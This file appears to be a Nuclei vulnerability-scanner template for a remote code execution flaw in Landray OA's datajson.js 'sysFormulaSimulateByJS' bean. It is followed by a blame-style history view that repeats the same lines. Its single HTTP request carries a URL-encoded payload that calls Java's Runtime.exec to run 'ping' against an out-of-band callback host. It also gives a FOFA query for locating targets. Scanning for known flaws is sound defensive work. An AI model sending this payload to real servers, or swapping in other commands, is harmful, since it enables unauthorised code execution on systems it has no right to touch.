nuclei-templates/http/vulnerabilities/other/landray-oa-datajson-rce.yaml

id: landray-oa-datajson-rce

info:
  name: Landray OA Datajson S Bean - Remote Code Execution
  author: SleepingBag945
  severity: critical
  description: |
    Landray Office Automation (OA) software, specifically in the "s_bean" component's "sysFormulaSimulateByJS" functionality. This vulnerability allows remote code execution (RCE), enabling attackers to execute arbitrary code on a target system.
  reference:
    - https://github.com/k3sc/Landray-oa-rce-1/blob/main/poc.py
    - https://github.com/hktalent/scan4all/blob/main/pocs_go/landray/Landray_RCE.go
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/landray-oa-datajson-rce.yaml
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="Landray-OA系统"
  tags: landray,rce,oast

http:
  - raw:
      - |
        GET /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20{{interactsh-url}}%22%29&type=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(body, "success") && contains(body, "true")'
        condition: and

# digest: 4a0a00473045022100c30869e1159f66aa441618f804300e32d0f5e003de591285026347eb63d951c002205f79c7cabb94b71315630bae5dd5530c5d3d960c82fda96a8c318032743fe7a0:922c64590222798bb761d5b6d8e72950
landray-oa-datajson-rce 2023-08-29 05:49:46 +00:00			`id: landray-oa-datajson-rce`

			`info:`
			`name: Landray OA Datajson S Bean - Remote Code Execution`
			`author: SleepingBag945`
			`severity: critical`
Update landray-oa-datajson-rce.yaml 2023-08-29 06:51:18 +00:00			`description: \|`
			`Landray Office Automation (OA) software, specifically in the "s_bean" component's "sysFormulaSimulateByJS" functionality. This vulnerability allows remote code execution (RCE), enabling attackers to execute arbitrary code on a target system.`
landray-oa-datajson-rce 2023-08-29 05:49:46 +00:00			`reference:`
			`- https://github.com/k3sc/Landray-oa-rce-1/blob/main/poc.py`
Update landray-oa-datajson-rce.yaml 2023-08-29 06:51:18 +00:00			`- https://github.com/hktalent/scan4all/blob/main/pocs_go/landray/Landray_RCE.go`
			`- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/landray-oa-datajson-rce.yaml`
landray-oa-datajson-rce 2023-08-29 05:49:46 +00:00			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 1`
landray-oa-datajson-rce 2023-08-29 05:49:46 +00:00			`fofa-query: app="Landray-OA系统"`
Update landray-oa-datajson-rce.yaml 2023-08-29 06:51:18 +00:00			`tags: landray,rce,oast`
landray-oa-datajson-rce 2023-08-29 05:49:46 +00:00
			`http:`
			`- raw:`
			`- \|`
			`GET /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20{{interactsh-url}}%22%29&type=1 HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code == 200'`
			`- 'contains(interactsh_protocol, "dns")'`
			`- 'contains(body, "success") && contains(body, "true")'`
Update landray-oa-datajson-rce.yaml 2023-08-29 06:01:15 +00:00			`condition: and`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a00473045022100c30869e1159f66aa441618f804300e32d0f5e003de591285026347eb63d951c002205f79c7cabb94b71315630bae5dd5530c5d3d960c82fda96a8c318032743fe7a0:922c64590222798bb761d5b6d8e72950`